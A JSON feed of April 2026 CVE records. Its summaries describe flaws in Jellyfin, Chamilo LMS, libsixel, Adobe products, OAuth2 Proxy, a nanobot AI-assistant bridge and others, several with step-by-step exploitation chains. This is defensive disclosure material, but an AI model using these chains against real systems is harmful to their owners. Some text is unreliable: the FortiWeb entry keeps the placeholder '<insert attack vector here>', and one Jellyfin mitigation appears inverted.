{"cves":[{"cve_id":"CVE-2026-35589","summary":"nanobot is a personal AI assistant. Versions prior to 0.1.5 contain a Cross-Site WebSocket Hijacking (CSWSH) vulnerability exists in the bridge's WebSocket server in bridge/src/server.ts, resulting from an incomplete remediation of CVE-2026-2577. The original fix changed the binding from 0.0.0.0 to 127.0.0.1 and added an optional BRIDGE_TOKEN parameter, but token authentication is disabled by default and the server does not validate the Origin header during the WebSocket handshake. Because browsers do not enforce the Same-Origin Policy on WebSockets unless the server explicitly denies cross-origin connections, any website visited by a user running the bridge can establish a WebSocket connection to ws://127.0.0.1:3001/ and gain full access to the bridge API. This allows an attacker to hijack the WhatsApp session, read incoming messages, steal authentication QR codes, and send messages on behalf of the user. This issue has bee fixed in version 0.1.5.","cvss":8.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/HKUDS/nanobot/releases/tag/v0.1.5","https://github.com/HKUDS/nanobot/security/advisories/GHSA-v5j3-4q66-58cf"],"published_time":"2026-04-14T23:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39387","summary":"BoidCMS is an open-source, PHP-based flat-file CMS for building simple websites and blogs, using JSON as its database. Versions prior to 2.1.3 are vulnerable to a critical Local File Inclusion (LFI) attack via the tpl parameter, which can lead to Remote Code Execution (RCE).The application fails to sanitize the tpl (template) parameter during page creation and updates. This parameter is passed directly to a require_once() statement without path validation. An authenticated administrator can exploit this by injecting path traversal sequences (../) into the tpl value to escape the intended theme directory and include arbitrary files — specifically, files from the server's media/ directory. When combined with the file upload functionality, this becomes a full RCE chain: an attacker can first upload a file with embedded PHP code (e.g., disguised as image data), then use the path traversal vulnerability to include that file via require_once(), executing the embedded code with web server privileges. This issue has been fixed in version 2.1.3.","cvss":7.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.2,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/BoidCMS/BoidCMS/releases/tag/v2.1.3","https://github.com/BoidCMS/BoidCMS/security/advisories/GHSA-45xp-xw54-6cv6"],"published_time":"2026-04-14T23:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39399","summary":"NuGet Gallery is a package repository that powers nuget.org. A security vulnerability exists in the NuGetGallery backend job’s handling of .nuspec files within NuGet packages. An attacker can supply a crafted nuspec file with malicious metadata, leading to cross package metadata injection that may result in remote code execution (RCE) and/or arbitrary blob writes due to insufficient input validation. The issue is exploitable via URI fragment injection using unsanitized package identifiers, allowing an attacker to control the resolved blob path. This enables writes to arbitrary blobs within the storage container, not limited to .nupkg files, resulting in potential tampering of existing content. This issue has been patched in commit 0e80f87628349207cdcaf55358491f8a6f1ca276.","cvss":9.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.6,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/NuGet/NuGetGallery/commit/0e80f87628349207cdcaf55358491f8a6f1ca276","https://github.com/NuGet/NuGetGallery/security/advisories/GHSA-9r3h-v4hx-rhfr"],"published_time":"2026-04-14T23:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40688","summary":"A out-of-bounds write vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.3, FortiWeb 7.6.0 through 7.6.6, FortiWeb 7.4.0 through 7.4.11 may allow attacker to execute unauthorized code or commands via <insert attack vector here>","cvss":7.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.2,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-127"],"published_time":"2026-04-14T23:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34454","summary":"OAuth2 Proxy is a reverse proxy that provides authentication using OAuth2 providers. A regression introduced in 7.11.0 prevents OAuth2 Proxy from clearing the session cookie when rendering the sign-in page. In deployments that rely on the sign-in page as part of their logout flow, a user may be shown the sign-in page while the existing session cookie remains valid, meaning the browser session is not actually logged out. On shared workstations or devices, a subsequent user could continue to use the previous user's authenticated session. Deployments that use a dedicated logout/sign-out endpoint to terminate sessions are not affected. This issue is fixed in 7.15.2","cvss":3.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":3.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/oauth2-proxy/oauth2-proxy/releases/tag/v7.15.2","https://github.com/oauth2-proxy/oauth2-proxy/security/advisories/GHSA-f24x-5g9q-753f"],"published_time":"2026-04-14T23:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34457","summary":"OAuth2 Proxy is a reverse proxy that provides authentication using OAuth2 providers. Versions prior to 7.15.2 contain a configuration-dependent authentication bypass in deployments where OAuth2 Proxy is used with an auth_request-style integration (such as nginx auth_request) and either --ping-user-agent is set or --gcp-healthchecks is enabled. In affected configurations, OAuth2 Proxy treats any request with the configured health check User-Agent value as a successful health check regardless of the requested path, allowing an unauthenticated remote attacker to bypass authentication and access protected upstream resources. Deployments that do not use auth_request-style subrequests or that do not enable --ping-user-agent/--gcp-healthchecks are not affected. This issue is fixed in 7.15.2.","cvss":9.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/oauth2-proxy/oauth2-proxy/releases/tag/v7.15.2","https://github.com/oauth2-proxy/oauth2-proxy/security/advisories/GHSA-5hvv-m4w4-gf6v"],"published_time":"2026-04-14T23:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35031","summary":"Jellyfin is an open source self hosted media server. Versions prior to 10.11.7 contain a vulnerability chain in the subtitle upload endpoint (POST /Videos/{itemId}/Subtitles), where the Format field is not validated, allowing path traversal via the file extension and enabling arbitrary file write. This arbitrary file write can be chained into arbitrary file read via .strm files, database extraction, admin privilege escalation, and ultimately remote code execution as root via ld.so.preload. Exploitation requires an administrator account or a user that has been explicitly granted the \"Upload Subtitles\" permission. This issue has been fixed in version 10.11.7. If users are unable to upgrade immediately, they can grant non-administrator users Subtitle upload permissions to reduce attack surface.","cvss":9.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.9,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/jellyfin/jellyfin/releases/tag/v10.11.7","https://github.com/jellyfin/jellyfin/security/advisories/GHSA-j2hf-x4q5-47j3"],"published_time":"2026-04-14T23:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35032","summary":"Jellyfin is an open source self hosted media server. Versions prior to 10.11.7 contain a vulnerability chain in the LiveTV M3U tuner endpoint (POST /LiveTv/TunerHosts), where the tuner URL is not validated, allowing local file read via non-HTTP paths and Server-Side Request Forgery (SSRF) via HTTP URLs. This is exploitable by any authenticated user because the EnableLiveTvManagement permission defaults to true for all new users. An attacker can chain these vulnerabilities by adding an M3U tuner pointing to an attacker-controlled server, serving a crafted M3U with a channel pointing to the Jellyfin database, exfiltrating the database to extract admin session tokens, and escalating to admin privileges. This issue has been fixed in version 10.11.7. If users are unable to upgrade immediately, they can disable Live TV Management privileges for all users.","cvss":8.6,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.6,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/jellyfin/jellyfin/releases/tag/v10.11.7","https://github.com/jellyfin/jellyfin/security/advisories/GHSA-8fw7-f233-ffr8"],"published_time":"2026-04-14T23:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35033","summary":"Jellyfin is an open source self hosted media server. Versions prior to 10.11.7 contain an unauthenticated arbitrary file read vulnerability via ffmpeg argument injection through the StreamOptions query parameter parsing mechanism. The ParseStreamOptions method in StreamingHelpers.cs adds any lowercase query parameter to a dictionary without validation, bypassing the RegularExpression attribute on the level controller parameter, and the unsanitized value is concatenated directly into the ffmpeg command line. By injecting a drawtext filter with a textfile argument, an attacker can read arbitrary server files such as /etc/shadow and exfiltrate their contents as text rendered in the video stream response. The vulnerable /Videos/{itemId}/stream endpoint has no Authorize attribute, making this exploitable without authentication, though item GUIDs are pseudorandom and require an authenticated user to obtain. This issue has been fixed in version 10.11.7.","cvss":9.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":9.3,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/jellyfin/jellyfin/releases/tag/v10.11.7","https://github.com/jellyfin/jellyfin/security/advisories/GHSA-jh22-fw8w-2v9x"],"published_time":"2026-04-14T23:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35034","summary":"Jellyfin is an open source self hosted media server. Versions prior to 10.11.7 contain a denial of service vulnerability in the SyncPlay group creation endpoint (POST /SyncPlay/New), where an authenticated user can create groups with names of unlimited size due to insufficient input validation. By sending large payloads combined with arbitrary group IDs, an attacker can lock out the endpoint for other clients attempting to join SyncPlay groups and significantly increase the memory usage of the Jellyfin process, potentially leading to an out-of-memory crash. This issue has been fixed in version 10.11.7.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/jellyfin/jellyfin/releases/tag/v10.11.7","https://github.com/jellyfin/jellyfin/security/advisories/GHSA-v2jv-54xj-h76w"],"published_time":"2026-04-14T23:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27299","summary":"Adobe Framemaker versions 2022.8 and earlier are affected by an Improper Input Validation vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to access sensitive files or data on the system. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":6.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.3,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/framemaker/apsb26-36.html"],"published_time":"2026-04-14T23:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27300","summary":"Adobe Framemaker versions 2022.8 and earlier are affected by an Access of Uninitialized Pointer vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to disclose sensitive information. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/framemaker/apsb26-36.html"],"published_time":"2026-04-14T23:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27301","summary":"Adobe Framemaker versions 2022.8 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to disclose sensitive information stored in memory. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/framemaker/apsb26-36.html"],"published_time":"2026-04-14T23:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33021","summary":"libsixel is a SIXEL encoder/decoder implementation derived from kmiya's sixel. Versions 1.8.7 and prior contain a use-after-free vulnerability in sixel_encoder_encode_bytes() because sixel_frame_init() stores the caller-owned pixel buffer pointer directly in frame->pixels without making a defensive copy. When a resize operation is triggered, sixel_frame_convert_to_rgb888() unconditionally frees this caller-owned buffer and replaces it with a new internal allocation, leaving the caller with a dangling pointer. Any subsequent access to the original buffer by the caller constitutes a use-after-free, confirmed by AddressSanitizer. An attacker who controls incoming frames can trigger this bug repeatedly and predictably, resulting in a reliable crash with potential for code execution. This issue has been fixed in version 1.8.7-r1.","cvss":7.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.3,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/saitoha/libsixel/releases/tag/v1.8.7-r1","https://github.com/saitoha/libsixel/security/advisories/GHSA-j6m5-2cc7-3whc"],"published_time":"2026-04-14T23:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33023","summary":"libsixel is a SIXEL encoder/decoder implementation derived from kmiya's sixel. In versions 1.8.7 and prior, when built with the --with-gdk-pixbuf2 option, a use-after-free vulnerability exists in load_with_gdkpixbuf() in loader.c. The cleanup path manually frees the sixel_frame_t object and its internal buffers without consulting the reference count, even though the object was created via the refcounted constructor sixel_frame_new() and exposed to the public callback. A callback that calls sixel_frame_ref(frame) to retain a logically valid reference will hold a dangling pointer after sixel_helper_load_image_file() returns, and any subsequent access to the frame or its fields triggers a use-after-free confirmed by AddressSanitizer. The root cause is a consistency failure between two cleanup strategies in the same codebase: sixel_frame_unref() is used in load_with_builtin() but raw free() is used in load_with_gdkpixbuf(). An attacker supplying a crafted image to any application built against libsixel with gdk-pixbuf2 support can trigger this reliably, potentially leading to information disclosure, memory corruption, or code execution. This issue has been fixed in version 1.8.7-r1.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/saitoha/libsixel/releases/tag/v1.8.7-r1","https://github.com/saitoha/libsixel/security/advisories/GHSA-hr25-g2j6-qjw6"],"published_time":"2026-04-14T23:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33414","summary":"Podman is a tool for managing OCI containers and pods. Versions 4.8.0 through 5.8.1 contain a command injection vulnerability in the HyperV machine backend in pkg/machine/hyperv/stubber.go, where the VM image path is inserted into a PowerShell double-quoted string without sanitization, allowing $() subexpression injection. Because PowerShell evaluates subexpressions inside double-quoted strings before executing the outer command, an attacker who can control the VM image path through a crafted machine name or image directory can execute arbitrary PowerShell commands with the privileges of the Podman process. On typical Windows installations this means SYSTEM-level code execution, and only Windows is affected as the code is exclusive to the HyperV backend. This issue has been patched in version 5.8.2.","cvss":4.0,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":4.0,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/containers/podman/commit/571c842bd357ee626019ea97d030fb772fc654ed","https://github.com/containers/podman/security/advisories/GHSA-hc8w-h2mf-hp59"],"published_time":"2026-04-14T23:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27293","summary":"Adobe Framemaker versions 2022.8 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/framemaker/apsb26-36.html"],"published_time":"2026-04-14T23:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27294","summary":"Adobe Framemaker versions 2022.8 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/framemaker/apsb26-36.html"],"published_time":"2026-04-14T23:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27295","summary":"Adobe Framemaker versions 2022.8 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/framemaker/apsb26-36.html"],"published_time":"2026-04-14T23:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27296","summary":"Adobe Framemaker versions 2022.8 and earlier are affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/framemaker/apsb26-36.html"],"published_time":"2026-04-14T23:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27297","summary":"Adobe Framemaker versions 2022.8 and earlier are affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/framemaker/apsb26-36.html"],"published_time":"2026-04-14T23:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27298","summary":"Adobe Framemaker versions 2022.8 and earlier are affected by an Access of Resource Using Incompatible Type ('Type Confusion') vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/framemaker/apsb26-36.html"],"published_time":"2026-04-14T23:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27290","summary":"Adobe Framemaker versions 2022.8 and earlier are affected by an Untrusted Search Path vulnerability that might allow attackers to execute arbitrary code in the context of the current user. If the application uses a search path to locate critical resources such as programs, then an attacker could modify that search path to point to a malicious program, which the targeted application would then execute. Exploitation of this issue does not require user interaction.","cvss":8.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.6,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/framemaker/apsb26-36.html"],"published_time":"2026-04-14T23:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27292","summary":"Adobe Framemaker versions 2022.8 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/framemaker/apsb26-36.html"],"published_time":"2026-04-14T23:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39906","summary":"Unisys WebPerfect Image Suite versions 3.0.3960.22810 and 3.0.3960.22604 expose a deprecated .NET Remoting TCP channel that allows remote unauthenticated attackers to leak NTLMv2 machine-account hashes by supplying a Windows UNC path as a target file argument through object-unmarshalling techniques. Attackers can capture the leaked NTLMv2 hash and relay it to other hosts to achieve privilege escalation or lateral movement depending on network configuration and patch level.","cvss":7.0,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":7.0,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.unisys.com/solutions/cai/applications/","https://www.vulncheck.com/advisories/unisys-webperfect-image-suite-ntlmv2-hash-leakage-via-net-remoting"],"published_time":"2026-04-14T22:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39907","summary":"Unisys WebPerfect Image Suite versions 3.0.3960.22810 and 3.0.3960.22604 expose an unauthenticated WCF SOAP endpoint on TCP port 1208 that accepts unsanitized file paths in the ReadLicense action's LFName parameter, allowing remote attackers to trigger SMB connections and leak NTLMv2 machine-account hashes. Attackers can submit crafted SOAP requests with UNC paths to force the server to initiate outbound SMB connections, exposing authentication credentials that may be relayed for privilege escalation or lateral movement within the network.","cvss":7.0,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":7.0,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.unisys.com/solutions/cai/applications/","https://www.vulncheck.com/advisories/unisys-webperfect-image-suite-ntlmv2-hash-leakage-via-wcf-soap"],"published_time":"2026-04-14T22:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40291","summary":"Chamilo LMS is an open-source learning management system. In versions prior to 2.0.0-RC.3, an insecure direct object modification vulnerability in the PUT /api/users/{id} endpoint allows any authenticated user with ROLE_STUDENT to escalate their privileges to ROLE_ADMIN by modifying the roles field on their own user record. The API Platform security expression is_granted('EDIT', object) only verifies record ownership, and the roles field is included in the writable serialization group, enabling any user to set arbitrary roles such as ROLE_ADMIN. Successful exploitation grants full administrative control of the platform, including access to all courses, user data, grades, and administrative settings. This issue has been fixed in version 2.0.0-RC.3.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/releases/tag/v2.0.0-RC.3","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-7phx-w897-4c9x"],"published_time":"2026-04-14T22:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34212","summary":"Docmost is open-source collaborative wiki and documentation software. In versions prior to 0.71.0, improper neutralization of attachment URLs in Docmost allows a low-privileged authenticated user to store a malicious `javascript:` URL inside an attachment node in page content. When another user views the page and activates the attachment link/icon, attacker-controlled JavaScript executes in the context of the Docmost origin. Version 0.71.0 patches the issue.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/docmost/docmost/security/advisories/GHSA-cf68-cff9-hq4w"],"published_time":"2026-04-14T22:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34213","summary":"Docmost is open-source collaborative wiki and documentation software. Starting in version 0.3.0 and prior to version 0.71.0, improper authorization in Docmost allows a low-privileged authenticated user to overwrite another page's attachment within the same workspace by supplying a victim `attachmentId` to `POST /api/files/upload`. This is a remote integrity issue requiring no victim interaction. Version 0.71.0 contains a patch.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/docmost/docmost/security/advisories/GHSA-89fp-2hch-j9gp"],"published_time":"2026-04-14T22:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34370","summary":"Chamilo LMS is an open-source learning management system. In versions prior to 2.0.0-RC.3, the notebook module contains an Insecure Direct Object Reference (IDOR) vulnerability that allows any authenticated student to read the private course notes of any other user on the platform by manipulating the notebook_id parameter in the editnote action. The application fetches the note content using only the supplied integer ID without verifying that the requesting user owns the note, and the full title and HTML body are rendered in the edit form and returned to the attacker's browser. While ownership checks exist in the write paths (updateNote() and delete_note()), they are entirely absent from the read path (get_note_information()). This issue has been fixed in version 2.0.0-RC.3.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/releases/tag/v2.0.0-RC.3","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-fm35-2hvw-564q"],"published_time":"2026-04-14T22:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34602","summary":"Chamilo LMS is an open-source learning management system. In versions prior to 2.0.0-RC.3, the /api/course_rel_users endpoint is vulnerable to Insecure Direct Object Reference (IDOR), allowing an authenticated attacker to modify the user parameter in the request body to enroll any arbitrary user into any course without proper authorization checks. The backend trusts the user-supplied input for the user field and performs no server-side verification that the requester owns the referenced user ID or has permission to act on behalf of other users. This enables unauthorized manipulation of user-course relationships, potentially granting unintended access to course materials, bypassing enrollment controls, and compromising platform integrity. This issue has been fixed in version  2.0.0-RC.3.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/2a9f060fa9d50fc9a92ed93af774d2619642df92","https://github.com/chamilo/chamilo-lms/commit/bd2ba34c2e74475587e38c74c90c2934e69c8779","https://github.com/chamilo/chamilo-lms/commit/c9c30cdc48afae57cd6ab012ae2eceafd351a40e","https://github.com/chamilo/chamilo-lms/releases/tag/v2.0.0-RC.3","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-x373-8j9j-g5pj"],"published_time":"2026-04-14T22:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34619","summary":"ColdFusion versions 2023.18, 2025.6 and earlier are affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to access unauthorized files or directories outside the intended restrictions. Exploitation of this issue does not require user interaction.","cvss":7.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/coldfusion/apsb26-38.html"],"published_time":"2026-04-14T22:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34631","summary":"InCopy versions 20.5.2, 21.2 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/incopy/apsb26-33.html"],"published_time":"2026-04-14T22:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35196","summary":"Chamilo LMS is an open-source learning management system. In versions prior to 2.0.0-RC.3, an OS Command Injection vulnerability exists in the main/inc/ajax/gradebook.ajax.php endpoint within the export_all_certificates action, where the course code retrieved from the session variable $_SESSION['_cid'] via api_get_course_id() is concatenated directly into a shell_exec() command string without sanitization or escaping using escapeshellarg(). If an attacker can manipulate or poison their session data to inject shell metacharacters into the _cid variable, they can achieve arbitrary command execution on the underlying server. Successful exploitation grants full access to read system files and credentials, alters the application and database, or disrupts server availability. This issue has been fixed in version 2.0.0-RC.3.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/62671e5e268f235cddfba704edee90f35c234df1","https://github.com/chamilo/chamilo-lms/releases/tag/v2.0.0-RC.3","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-crc6-r6c7-44q3"],"published_time":"2026-04-14T22:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27308","summary":"ColdFusion versions 2023.18, 2025.6 and earlier are affected by an Uncontrolled Resource Consumption vulnerability that could lead to application denial-of-service. A high-privileged attacker could exploit this vulnerability and exhaust system resources, reducing application speed. Exploitation of this issue does not require user interaction.","cvss":2.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/coldfusion/apsb26-38.html"],"published_time":"2026-04-14T22:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33018","summary":"libsixel is a SIXEL encoder/decoder implementation derived from kmiya's sixel. Versions 1.8.7 and prior contain a Use-After-Free vulnerability via the load_gif() function in fromgif.c, where a single sixel_frame_t object is reused across all frames of an animated GIF and gif_init_frame() unconditionally frees and reallocates frame->pixels between frames without consulting the object's reference count. Because the public API explicitly provides sixel_frame_ref() to retain a frame and sixel_frame_get_pixels() to access the raw pixel buffer, a callback following this documented usage pattern will hold a dangling pointer after the second frame is decoded, resulting in a heap use-after-free confirmed by ASAN. Any application using sixel_helper_load_image_file() with a multi-frame callback to process user-supplied animated GIFs is affected, with a reliable crash as the minimum impact and potential for code execution. This issue has been fixed in version 1.8.7-r1.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/saitoha/libsixel/releases/tag/v1.8.7-r1","https://github.com/saitoha/libsixel/security/advisories/GHSA-w46f-jr9f-rgvp"],"published_time":"2026-04-14T22:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33019","summary":"libsixel is a SIXEL encoder/decoder implementation derived from 